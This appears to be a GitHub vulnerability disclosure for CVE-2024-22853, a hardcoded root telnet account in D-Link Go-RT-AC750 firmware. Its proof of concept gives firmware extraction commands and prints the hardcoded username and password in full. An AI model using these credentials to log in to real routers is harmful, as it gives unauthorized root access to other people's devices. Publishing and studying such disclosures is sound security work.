FaLLenSKiLL1/CVE-2024-22853

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

CVE-2024-22853

D-LINK Go-RT-AC750 GORTAC750_A1_FW_v101b03 has a hardcoded password for the Alphanetworks account, which allows remote attackers to obtain root access via a telnet session.

PoC

https://www.dlink.com/se/sv/products/go-rt-ac750-wireless-ac750-dual-band-easy-router?revision=deu_reva#downloads

binwalk GORTAC750_A1_FW_v101b03.bin -e

cat './go-rt-ac750_fw_reva_1-01b03_eu_multi_20141017/_GORTAC750_A1_FW_v101b03.bin.extracted/squashfs-root/etc/init0.d/S80telnetd.sh'

Hardcoded Creds:

Alphanetworks:wrgac18_dlob.hans_ac750